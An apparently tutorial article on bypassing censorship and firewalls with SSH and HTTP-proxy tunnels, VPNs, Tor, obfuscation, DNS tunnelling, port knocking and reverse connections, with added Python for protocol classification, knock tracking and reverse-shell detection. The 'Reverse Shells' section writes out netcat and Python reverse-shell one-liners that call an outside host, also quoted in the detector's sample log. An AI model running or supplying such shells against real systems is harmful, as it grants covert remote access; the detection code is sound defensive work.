Bypassing-Firewalls-with-Remote-Login-Tools

luan@offsce.com

Censorship Circumvention – Bypassing Firewalls & Deep Packet Inspection

Circumventing Censorship and Bypassing Firewalls

  1. Censorship and Restrictions:
    • Involves blocking content through firewalls, proxies, and deep packet inspection.
    • Common in countries like China with the Great Firewall, or on private networks like schools or workplaces.
  2. Purpose:
    • Access restricted sites like Facebook or bypass ISP blocks and network restrictions.

How Censorship Works

  1. Devices Involved:
    • Firewalls, proxies, and censoring devices enforce outbound access restrictions.
    • Block specific content, IP addresses, domains, ports, and protocols.
  2. Techniques Used:
    • Application layer filtering and deep packet inspection to block based on protocol rules.
    • TCP reset injection and DNS poisoning to enforce keyword and domain blocking.

Methods to Bypass Censorship

  1. Using Encrypted Tunnels:
    • Encrypt traffic to mask it from the censoring device.
    • Use allowed ports like TCP 80 (HTTP) and TCP 443 (HTTPS) to send encrypted traffic.
    • Example tool: GNU httptunnel, which carries the tunnel inside ordinary HTTP requests and responses.
  2. Proxies:
    • Weak form of evasion but can bypass simple checks.
    • Includes HTTP, HTTPS, and SOCKS proxies; suitable only where the consequences of being detected are minor.
  3. SSH Tunneling (Dynamic Port Forwarding):
    • Create a tunnel through firewalls to an SSH server, possibly using ports like 80 or 443.
    • Requires server-side changes or providers supporting different ports.
    • May be susceptible to deep packet inspection if adversaries identify SSH traffic.

Challenges and Considerations

  1. Deep Packet Inspection:
    • Can detect and block encrypted protocols like SSH if not properly masked.
    • Requires advanced configurations to bypass.
  2. Destination-Based Censorship:
    • Blocks access based on user location or IP address, like BBC or Netflix.
    • Requires changing perceived location through proxies or VPNs.
  3. Web Traffic Fingerprinting:
    • Even encrypted traffic can be analyzed to determine the destination.

Understanding these techniques helps in navigating through censorship and restrictions. Each method comes with its considerations and best fits different scenarios, from accessing blocked sites to maintaining privacy in restricted environments. Always ensure compliance with local laws and regulations when employing these methods.

Bypassing Firewalls and Censorship

OpenVPN Tunnels

  1. Overview:
    • Similar to SSH tunnels but using a different protocol.
    • Typically uses port 1194 on UDP but may need changing to bypass firewalls.
    • Port 53 UDP is optimal for speed, while port 443 can mimic regular traffic.
  2. Deep Packet Inspection (DPI):
    • Can identify VPN traffic despite encryption.
    • Requires server-side changes and a provider like AirVPN.
  3. Advantages:
    • Effective if destinations block your real IP or location.
    • Custom OpenVPN servers avoid known VPN blocks.

Challenges with VPNs

  1. Blocking by Services:
    • Services like Netflix block known VPNs.
    • Using personal VPN servers can bypass these blocks.
  2. Web Traffic Fingerprinting:
    • May reveal surfing destinations despite encryption.

Tor

  1. Designed for Bypassing Censorship:
    • Tor's pluggable transports (for example meek) disguise the connection to the Tor network so that a censor cannot block it simply by recognising Tor traffic.
  2. Limitations:
    • Not always foolproof; high-risk scenarios may require alternatives.
  3. Advantages:
    • Bypasses local censorship effectively if consequences are low.

Combining Techniques

  1. Nesting Layers:
    • Use nested tunnels, e.g., SSH out past the censor, then run Tor inside the SSH tunnel.
    • Useful if certain protocols like Tor are blocked.
  2. Multi-Layered Approach:
    • Combine SSH, VPNs, and Tor for enhanced evasion.

Other Methods

  1. Alternative Networks:
    • Use mobile networks or hotspots if traditional bypassing fails.
  2. Advanced Techniques:
    • Combine methods for complex bypass strategies.

Bypassing firewalls and censorship requires understanding different technologies and their limitations. OpenVPN and Tor offer powerful solutions but may need customization or combination with other techniques to be effective. Consider the level of adversary and consequences when choosing a method.

Bypassing HTTP Proxies

When you are behind an HTTP proxy, such as at work, school, university, or on a private network, you may need to bypass it to access the internet freely. This guide will walk you through identifying the proxy settings and using tools like Corkscrew and Proxy Tunnel to bypass HTTP proxies.

Identifying Proxy Settings

  1. Browser Settings:
    • Check your browser settings to determine if you are using a proxy. Look for “HTTP proxy” in the network settings.
    • Note down the IP address and port number of the proxy server.
  2. Windows Internet Explorer:
    • On Windows, check Internet Explorer for system proxy settings.
    • Again, note down the IP address and port number.
  3. Transparent Proxies:
    • If you are using a transparent proxy, there will be no settings in the browser, and you will automatically go through the proxy.
  4. Auto-Detect Proxy Settings:
    • If you are using auto-detect proxy settings, you may be using a Proxy Auto-Config (PAC) file. Locate the PAC file to find the proxy’s IP address and port.

Types of HTTP Proxies

  1. HTTP-Only Proxies:
    • Many HTTP proxies do not proxy HTTPS traffic. They only proxy HTTP because proxying HTTPS takes more administrative effort, including issuing and installing interception certificates.
    • Instead, these proxies use the HTTP CONNECT method to relay the encrypted HTTPS stream unchanged to the final destination.
  2. Full HTTPS Proxies:
    • Some proxies fully proxy HTTPS traffic, breaking the encryption at the proxy server.
    • These proxies can filter traffic based on its content, as they have access to the decrypted data.

Bypassing HTTP Proxies

ProxyTunnel
  1. Corkscrew:
    • Corkscrew is a tool for tunneling SSH through HTTP proxies. It supports multiple operating systems, including Mac OS X, Windows, and Linux.
    • Install Corkscrew using your package manager (e.g., sudo apt-get install corkscrew on Debian/Kali).
  2. Using Corkscrew:
    • Open a dynamic SOCKS proxy on your local machine that sends traffic through the HTTP proxy to an SSH server.
    • Example command: ssh -p 22 -o ProxyCommand="corkscrew <proxy_ip> <proxy_port> %h %p" -D 8080 demo.offsce.com
    • Replace <proxy_ip> and <proxy_port> with the IP address and port of the proxy server.
    • Replace 22 with the port allowed by your firewall (e.g., 80 or 443).
  3. Proxy Tunnel:
    • Proxy Tunnel is another tool for tunneling traffic through HTTP proxies. It is available for Windows, Linux, and Mac.
    • Install Proxy Tunnel using your package manager (e.g., sudo apt-get install proxytunnel on Debian/Kali).
  4. Using Proxy Tunnel:
    • Example command: ssh -p 22 -o ProxyCommand="proxytunnel -p <proxy_ip>:<proxy_port> -d %h:%p" -D 8080 demo.offsce.com
    • Replace <proxy_ip> and <proxy_port> with the IP address and port of the proxy server.
    • Replace 22 with the port allowed by your firewall (e.g., 80 or 443).

Handling Authentication and Additional Requirements

  1. Proxy Authentication:
    • If the proxy requires authentication, you can pass the username and password with Proxy Tunnel's -P option: proxytunnel -p <proxy_ip>:<proxy_port> -P username:password -d demo.offsce.com:22
    • Alternatively, store the credentials in a file and point to it with the -F option: proxytunnel -p <proxy_ip>:<proxy_port> -F authfile -d demo.offsce.com:22
  2. User Agent and Referrer:
    • Some proxies may also require headers such as a User-Agent and Referer. You can supply them with Proxy Tunnel's -H option: proxytunnel -p <proxy_ip>:<proxy_port> -H "User-Agent: <user_agent>" -H "Referer: <referrer>" -d demo.offsce.com:22

Simplifying Commands with SSH Config

  1. SSH Config File:
    • To simplify the command, you can configure the SSH client to use the proxy settings automatically by adding a Host block to the SSH config file (~/.ssh/config):
        Host demo
            User your_username
            HostName demo.offsce.com
            Port 22
            DynamicForward 8080
            ProxyCommand proxytunnel -p <proxy_ip>:<proxy_port> -d %h:%p
    • Replace <proxy_ip> and <proxy_port> with the IP address and port of the proxy server.
    • Replace 22 with the port allowed by your firewall (e.g., 80 or 443).

Other Tools

  1. HTTP Tunnel:
    • HTTP Tunnel is another tool that creates a connection between a server and a client over HTTP, bypassing HTTP proxies.
    • Available for Windows and Linux.
  2. NTLM Authentication Proxy:
    • If the corporate HTTP proxy demands NTLM authentication in a Windows environment, run a local NTLM authentication proxy such as Cntlm, which authenticates to the upstream proxy on behalf of tools that cannot speak NTLM themselves.

Bypassing HTTP proxies can be achieved using tools like Corkscrew and Proxy Tunnel. By understanding the proxy settings and using the appropriate tools, you can create a secure tunnel to access the internet freely. Always consider the consequences of bypassing proxies, as a keen administrator may discover these techniques.

Bypassing Firewalls with Port Sharing and Port Knocking

When you are being censored or monitored, the censor may actively probe your connections to determine where you are going or coming from. This can be detected if the traffic doesn’t match the expected pattern, such as DNS requests or normal web traffic. To avoid detection, you can use techniques like port sharing and port knocking to confuse the probing and bypass firewalls.

Port Sharing

  1. What is Port Sharing?
    • Port sharing involves running multiple services on the same port. For example, you can run HTTPS, SSH, OpenVPN, and other services on port 443.
    • Based on the handshake of the client connecting, the appropriate service will continue the connection.
  2. SSLH: Application Protocol Multiplexer
    • SSLH is a free, open-source application protocol multiplexer that allows you to run multiple services on the same port.
    • It supports protocols like HTTP, HTTPS, SSH, OpenVPN, Tinc, XMPP, and more.
    • SSLH is available for Debian, Gentoo, FreeBSD, and other operating systems.
    • Installation:
      • SSLH can be installed from the Debian repository using sudo apt-get install sslh.
    • Configuration:
      • SSLH itself binds the shared port (e.g., 443) and is told where each protocol's real service listens (e.g., SSH on 127.0.0.1:22, the web server moved to 127.0.0.1:8443), so every backend must sit on its own local port and only SSLH faces the network.
  3. Guide for SSLH:
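As an added example (not sslh's code nor the original post's), the following Python models the handshake-based dispatch described above and, with the very same check, the deep packet inspection from the "Challenges and Considerations" section that notices SSH or OpenVPN on the HTTPS port. The byte patterns follow the protocols' public specifications; the backend addresses and sample client bytes are constructed.

```python
"""Handshake-based protocol identification on a shared port (added example).

Not code from sslh or the original post. A multiplexer reads the first bytes a
client sends on TCP 443 and dispatches to the matching backend; a DPI device reads
the same bytes to spot SSH or OpenVPN riding on the HTTPS port. Samples constructed.
"""
from typing import Dict, Optional, Tuple

HTTP_METHODS = (b"GET ", b"HEAD ", b"POST ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")

# Constructed backend map: where each protocol's real service listens locally.
BACKENDS: Dict[str, Tuple[str, int]] = {
    "ssh": ("127.0.0.1", 22),
    "tls": ("127.0.0.1", 8443),      # the web server, moved off 443
    "openvpn": ("127.0.0.1", 1194),
    "http": ("127.0.0.1", 8080),
}
# What a DPI policy expects to see on well-known ports.
EXPECTED_ON_PORT = {22: "ssh", 80: "http", 443: "tls"}


def classify(first_bytes: Optional[bytes]) -> str:
    """Name the protocol from the first bytes a client sends.

    None means nothing arrived before the probe timeout; sslh treats that as SSH
    by default, because many SSH clients wait for the server's identification
    string before sending their own (RFC 4253, section 4.2).
    """
    if first_bytes is None:
        return "ssh"
    if first_bytes.startswith(b"SSH-"):      # "SSH-2.0-..." identification string
        return "ssh"
    # TLS record header: ContentType 0x16 (handshake), version major 0x03,
    # two length bytes, then HandshakeType 0x01 (ClientHello).
    if (len(first_bytes) >= 6 and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03 and first_bytes[5] == 0x01):
        return "tls"
    # OpenVPN over TCP: 2-byte big-endian length, then an opcode byte whose
    # upper 5 bits are P_CONTROL_HARD_RESET_CLIENT_V2 (7) or _V3 (10).
    if (len(first_bytes) >= 3 and first_bytes[0] == 0x00
            and first_bytes[1] >= 14 and (first_bytes[2] >> 3) in (7, 10)):
        return "openvpn"
    if first_bytes.startswith(HTTP_METHODS):
        return "http"
    return "unknown"


def route(first_bytes: Optional[bytes]) -> Optional[Tuple[str, int]]:
    """Multiplexer view: pick the backend for this client, or None to drop it."""
    return BACKENDS.get(classify(first_bytes))


def dpi_check(dst_port: int, first_bytes: Optional[bytes]) -> Optional[str]:
    """DPI view: return an alert when the protocol does not fit the port."""
    seen = classify(first_bytes)
    expected = EXPECTED_ON_PORT.get(dst_port)
    if expected is not None and seen != expected:
        return f"port {dst_port}: expected {expected}, saw {seen}"
    return None


# Constructed first-byte samples, one per protocol.
SAMPLES = {
    "ssh": b"SSH-2.0-OpenSSH_9.6\r\n",
    "tls": bytes.fromhex("160301 00f5 01 0000f1 0303") + b"\x00" * 32,
    "openvpn": b"\x00\x0e\x38" + b"\x00" * 14,
    "http": b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:8s} -> {classify(data):8s} {route(data)} {dpi_check(443, data)}")
```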

OpenVPN Port Sharing

  1. Using OpenVPN's Port Share Feature:
    • OpenVPN's port-share <host> <port> server directive (TCP server mode only) passes any incoming connection that does not start with an OpenVPN handshake on to the given host and port, so a web server and OpenVPN can both answer on TCP 443.
  2. Setting Up on PFSense:
    • OpenVPN port sharing can also be configured on PFSense.
    • Refer to the PFSense guide for detailed instructions.

Port Knocking

  1. What is Port Knocking?
    • Port knocking is a method where you send a specific sequence of packets (or “knock”) to a server to enable a service, such as SSH.
    • Without the correct knock, the service appears to be unavailable.
  2. Implementations:
    • There are many implementations of port knocking, such as:
      • Knock Knock by Moxie
      • Port Knocking by Stefano
      • Simple Port Knocking by Daniel
    • Knock Knock by Moxie:
      • Knock Knock sends a single SYN packet to the server, carrying an IND-CCA secure encrypted request.
      • The server opens a specified port to a specified IP address, allowing you to connect.
  3. Use Case:
    • Port knocking can be used to reduce the attack surface on your server by keeping services like SSH closed until you need them.
    • It can also be used to bypass firewalls by knocking to enable a service temporarily, using it, and then closing it.
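As an added example (not Knock Knock's code or the original post's), this Python replays a constructed log of connection attempts through the per-client state a knock daemon keeps, and shows why the order of the knock ports matters when the server is also being port-scanned. All addresses, ports and timings are made up.

```python
"""Port-knock sequence tracking, modelled as server-side hardening (added example).

Not from Knock Knock or the other implementations named on this page. A SYN to the
next expected knock port advances a client, a SYN to any other knock port resets it,
and the whole sequence must finish inside a time window. Events are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Sequence, Set, Tuple

SynEvent = Tuple[float, str, int]   # (time, source address, destination port)


@dataclass
class KnockTracker:
    sequence: Sequence[int]          # knock ports, in the order they must be hit
    window: float = 10.0             # seconds allowed from first to last knock
    opened: Set[str] = field(default_factory=set)
    _stage: Dict[str, int] = field(default_factory=dict)
    _started: Dict[str, float] = field(default_factory=dict)

    def observe(self, ts: float, src: str, port: int) -> bool:
        """Feed one SYN; return True when src has just completed the sequence."""
        if port not in self.sequence:
            return False                 # unmonitored port: no effect on state
        stage = self._stage.get(src, 0)
        if stage and ts - self._started[src] > self.window:
            stage = 0                    # too slow: start over
        if port == self.sequence[stage]:
            if stage == 0:
                self._started[src] = ts
            stage += 1
        else:
            stage = 0                    # wrong order: reset, nothing opens
        done = stage == len(self.sequence)
        self._stage[src] = 0 if done else stage
        if done:
            self.opened.add(src)         # a real daemon would add a firewall rule here
        return done


def completed_knocks(sequence: Sequence[int], events: List[SynEvent],
                     window: float = 10.0) -> Set[str]:
    """Replay logged SYNs in time order and return the sources that opened the door."""
    tracker = KnockTracker(sequence, window)
    for ts, src, port in sorted(events):
        tracker.observe(ts, src, port)
    return tracker.opened


# Constructed SYN log: a correct client, a client that knocks too slowly, a client
# using the order 8000-7000-9000, and an ascending port scan that touches every
# knock port in increasing order (which is why a monotonic sequence is a poor choice).
EVENTS: List[SynEvent] = [
    (0.0, "203.0.113.10", 7000), (0.5, "203.0.113.10", 8000), (1.0, "203.0.113.10", 9000),
    (0.0, "203.0.113.20", 7000), (6.0, "203.0.113.20", 8000), (12.0, "203.0.113.20", 9000),
    (20.0, "203.0.113.30", 8000), (20.5, "203.0.113.30", 7000), (21.0, "203.0.113.30", 9000),
] + [(50.0 + p * 0.001, "198.51.100.5", p) for p in range(1, 10001)]

if __name__ == "__main__":
    print("ascending 7000-8000-9000 opened for:", completed_knocks((7000, 8000, 9000), EVENTS))
    print("non-monotonic 8000-7000-9000 opened for:", completed_knocks((8000, 7000, 9000), EVENTS))
```

The ascending sequence is completed by the port scanner as well as by the legitimate client, whereas the non-monotonic one is opened only by the client that knocked in that order.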

Port sharing and port knocking are effective techniques to bypass firewalls and confuse active probes. By running multiple services on the same port (e.g., SSLH or OpenVPN port sharing) or using port knocking to enable services temporarily, you can maintain privacy and anonymity while accessing restricted networks.

Traffic Cloaking and Obfuscation to Bypass Firewalls

Traffic cloaking and obfuscation techniques are designed to encrypt and alter your traffic to evade content filters and deep packet inspection (DPI). These methods allow you to bypass firewalls by making your traffic appear as legitimate or undetectable.

stunnel: TLS Encryption Wrapper

  1. What is stunnel?
    • stunnel is a proxy designed to add TLS (Transport Layer Security) encryption to existing clients and servers without requiring changes to the program's code.
    • It acts as a TLS/SSL encryption wrapper between a remote client and server.
  2. How It Works:
    • stunnel allows non-TLS-aware daemons to communicate with clients over TLS-protected channels.
    • It is commonly used to wrap traffic in TLS over port 443, which firewalls usually allow for HTTPS traffic.
  3. Example Use Case:
    • You can use stunnel to wrap OpenVPN traffic in TLS so that it looks like genuine HTTPS rather than OpenVPN, which DPI can otherwise detect.
  4. Features:
    • stunnel uses the OpenSSL library for encryption, supporting a wide range of cryptographic algorithms.
    • It is free software under the GNU GPL version 2 and available for multiple platforms, including Linux, Unix, Windows, Android, and more.
  5. Installation:
    • stunnel is available in the Debian repository as stunnel4. Install it using: sudo apt-get install stunnel4
    • It is also available for Windows, Mac OS X, iOS (via Cydia), and other platforms.
  6. Setting Up stunnel:

Obfsproxy and Pluggable Transports

  1. What are Pluggable Transports?
    • Obfsproxy and pluggable transports are techniques used to obfuscate traffic, making it appear as another protocol or random data.
    • These techniques are not limited to Tor and can be used for other traffic, such as OpenVPN or SSH.
  2. How It Works:
    • You can install Obfsproxy on your server and use it to obfuscate OpenVPN or SSH traffic, allowing it to bypass firewalls that block specific protocols.
    • Some pluggable transports make traffic look like another protocol (e.g., HTTP), while others make it appear random.
  3. Example: Meek Transport
    • Meek disguises traffic by routing it through a content delivery network (CDN). Blocking it means blocking the whole CDN, which many unrelated sites also rely on, so censors cannot block it without collateral damage to other users.
  4. Advantages:
    • Pluggable transports can evade IP-based blocks and casual DPI.
    • They are effective for bypassing firewalls that rely on protocol detection.
  5. Setting Up Obfsproxy:
    • Refer to the Obfsproxy guide for instructions on setting it up with OpenVPN or other protocols.

Other Cloaking and Obfuscation Tools

  1. Psiphon: Circumvention System
    • Psiphon combines VPN, SSH, and HTTP proxy transports and automatically falls back between them until one connects through the local filters.
  2. Lahana: Censorship-Busting Script
    • Lahana is a set of scripts that turn an Ubuntu EC2 instance into a censorship-busting VPN.
    • It tunnels traffic through Tor, allowing you to bypass firewalls that block Tor but allow VPNs.
  3. DNS Tunneling: dnscat2
    • DNS tunneling carries traffic inside DNS queries and responses on port 53 to bypass firewalls that let DNS through.
    • dnscat2 is a tool that supports encryption and centralized server management.
    • It is useful for bypassing firewalls that allow DNS but block other protocols.
    • Refer to the dnscat2 guide for setup instructions.
  4. Bidirectional VPN Over DNS
    • It is possible to set up a bidirectional VPN over DNS using tools like dnscat2 or iodine.
    • This is useful in environments where DNS resolves but other traffic is blocked (e.g., airports, hotels).


Traffic cloaking and obfuscation techniques like stunnel, Obfsproxy, Psiphon, Lahana, and DNS tunneling are powerful tools for bypassing firewalls and evading deep packet inspection. By encrypting and altering your traffic, you can maintain privacy and access restricted networks.

Bypassing Firewalls with Remote Login Tools

Remote login tools like VNC and RDP allow you to connect to a remote server and access its desktop, essentially giving you control of the remote machine. However, these tools often require direct connections through specific ports, which may be blocked by firewalls. This guide will explore how to bypass firewalls using remote login tools, tunneling techniques, and clientless solutions like Guacamole.

Traditional Remote Login Tools

  1. VNC (Virtual Network Computing):
    • Platform-independent remote framebuffer protocol; the server listens on TCP 5900 plus the display number by default.
  2. RDP (Remote Desktop Protocol):
    • Microsoft's remote desktop protocol, built into Windows; the server listens on TCP 3389 by default.

Challenges with Traditional Tools

  • Direct Connection Requirement:
    • Both VNC and RDP require a direct connection to the server, which may be blocked by firewalls.
    • Deep packet inspection (DPI) can detect and block these protocols, even if they use non-standard ports.

Tunneling Remote Login Tools

  1. Tunneling Through SSH:
    • You can tunnel VNC or RDP through SSH to add encryption and bypass firewalls.
    • Example Command for Local Port Forwarding: ssh -L 8080:localhost:5900 -p 443 user@remote_server
    • This command creates a local port (8080) on your machine that forwards to the VNC server (port 5900) on the remote server via SSH over port 443.
    • Configure your VNC client to connect to localhost:8080.
  2. Using stunnel:
    • stunnel can wrap VNC or RDP traffic in TLS, allowing it to pass firewalls that permit HTTPS traffic.
    • Example Configuration:
      • Wrap VNC or RDP traffic in TLS and forward it over port 443.

Clientless Remote Desktop Solutions

  1. Guacamole: Clientless Remote Desktop Gateway
    • Guacamole is a free, open-source, clientless remote desktop gateway that allows you to access remote desktops via a web browser.
    • It supports standard protocols like VNC and RDP.
    • Advantages:
      • Accessible via HTTPS, allowing it to bypass firewalls that allow HTTPS traffic.
      • No client software required; all you need is a web browser.
    • Setup:
      • Install Guacamole on your server and configure it to connect to your remote desktop.
      • Access Guacamole via a web browser using HTTPS.
  2. RDP via Browser Extension:
    • Some browser extensions allow you to access RDP without installing client software.
    • This can be useful in environments where installation is restricted.

Remote login tools like VNC and RDP can be powerful for accessing remote desktops, but their direct connection requirements often make them vulnerable to firewall restrictions. By tunneling these tools through SSH or using clientless solutions like Guacamole, you can bypass firewalls and maintain secure remote access.

Bypassing Firewalls with Reverse Connections

Sometimes, you may find yourself outside a firewall (e.g., on the internet) and want to access a network behind it, such as an office, private network, school, or university. If you can run code on a machine within the network, you can create reverse connections to bypass inbound firewall restrictions.

Reverse Connection Basics

  1. What is a Reverse Connection?
    • A reverse connection is a technique where a machine inside the firewall initiates an outbound connection to a server outside the firewall.
    • This allows communication even when inbound connections are blocked.
  2. How It Works:
    • The internal machine connects to an external server (e.g., on port 80 or 443) using an outbound connection.
    • The external server listens for these connections and forwards them to the client outside the firewall.

Remote Access Tools Using Reverse Connections

  1. TeamViewer and LogMeIn:
    • These tools use reverse connections to provide remote administration of devices behind firewalls and NAT (Network Address Translation).
    • They connect out through ports like 80 or 443 (HTTPS) to a central server.
    • The client outside the firewall connects to the central server, which forwards the connection to the internal device.
  2. Advantages:
    • Bypasses NAT and inbound firewall restrictions.
    • The internal device does not need to be permanently online; it only connects when needed.

Creating Reverse Connections with SSH

  1. Remote Port Forwarding:
    • SSH allows you to create reverse connections using remote port forwarding.
    • Example Command: ssh -R 8080:localhost:22 user@external_server
    • This command forwards port 22 on the internal machine to port 8080 on the external server.
  2. Dynamic DNS:
    • If the external server does not have a static IP, you can use dynamic DNS to ensure the internal machine knows where to connect.

Reverse Shells

  1. What is a Reverse Shell?
    • A reverse shell is a technique where an internal machine connects to an external server, providing a shell prompt for remote access.
  2. Setting Up a Reverse Shell:
    • Server Side (Listener):
      • Use a tool like Netcat to listen on a port (e.g., 8080): nc -lvp 8080
    • Client Side (Internal Machine):
      • Use Netcat to connect to the external server: nc -e /bin/bash external_server 8080
      • Alternatively, use Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("external_server",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  3. Advantages:
    • Provides remote access to the internal machine via a shell prompt.
    • Can be extended to establish a GUI connection if needed.
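From the defender's side, as an added example not drawn from the original post: detection logic that flags the two command-line patterns shown above (netcat with -e, and Python wiring a socket onto stdin/stdout/stderr before spawning a shell) in constructed process-execution log lines, while leaving ordinary netcat and Python invocations alone. The log format, timestamps and hostnames are made up.

```python
"""Spotting reverse-shell command lines in process-execution logs (added example).

Not from the original post. reasons() scores one command line as an EDR or auditd
execve record would carry it; scan() runs it over constructed log lines.
"""
import shlex
from typing import List

# Full shell paths only: a bare "sh" substring would match far too much.
SHELL_PATHS = ("/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "pty.spawn")


def reasons(cmdline: str) -> List[str]:
    """Return the indicators found in one command line (empty list if benign)."""
    found: List[str] = []
    try:
        argv = shlex.split(cmdline)
    except ValueError:                   # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    if not argv:
        return found
    prog = argv[0].rsplit("/", 1)[-1]

    # netcat handing the connection to a program: nc -e /bin/bash host port
    # (-c is exec in netcat-traditional/ncat but means TLS in OpenBSD nc, so it
    # is deliberately not matched here to avoid false positives)
    if prog in ("nc", "ncat", "netcat"):
        for flag in ("-e", "--exec", "--sh-exec"):
            if flag in argv:
                idx = argv.index(flag)
                target = argv[idx + 1] if idx + 1 < len(argv) else "<program>"
                found.append(f"netcat {flag} hands the connection to {target}")
                break

    # Python joining a socket to the standard descriptors, then an interactive shell
    if prog.startswith("python"):
        body = " ".join(argv[1:])
        if "socket" in body and "dup2" in body and any(s in body for s in SHELL_PATHS):
            found.append("python: socket + dup2 onto stdio + interactive shell")
    return found


def scan(log_lines: List[str]) -> List[str]:
    """Run reasons() over 'timestamp user command' lines; return the flagged lines."""
    flagged = []
    for line in log_lines:
        _, _, cmd = line.split(" ", 2)
        if reasons(cmd):
            flagged.append(line)
    return flagged


# Constructed execve-style log: two lines built from the commands shown on this
# page, two benign uses of the same tools.
LOG = [
    "2024-05-01T10:00:00Z www-data nc -e /bin/bash external_server 8080",
    "2024-05-01T10:00:05Z www-data python -c 'import socket,subprocess,os;s=socket.socket();"
    "s.connect((\"external_server\",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "2024-05-01T10:01:00Z ops nc -zv db.internal 5432",
    "2024-05-01T10:02:00Z ops python -c 'import socket; print(socket.gethostname())'",
]

if __name__ == "__main__":
    for line in scan(LOG):
        print("ALERT", line.split(" ", 2)[0], reasons(line.split(" ", 2)[2]))
```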

Other Reverse Shell Techniques

  1. Using Different Languages:

Reverse connections are a powerful way to bypass firewalls and access internal networks when inbound connections are blocked. By using tools like TeamViewer, LogMeIn, SSH, or creating reverse shells, you can maintain remote access to devices behind firewalls.

Conclusion

This article details ways to bypass firewalls and censorship, including encrypted tunnels, proxies, SSH tunnels, VPNs, Tor, and reverse connections. With these methods, restricted websites and networks can be accessed while maintaining privacy and anonymity.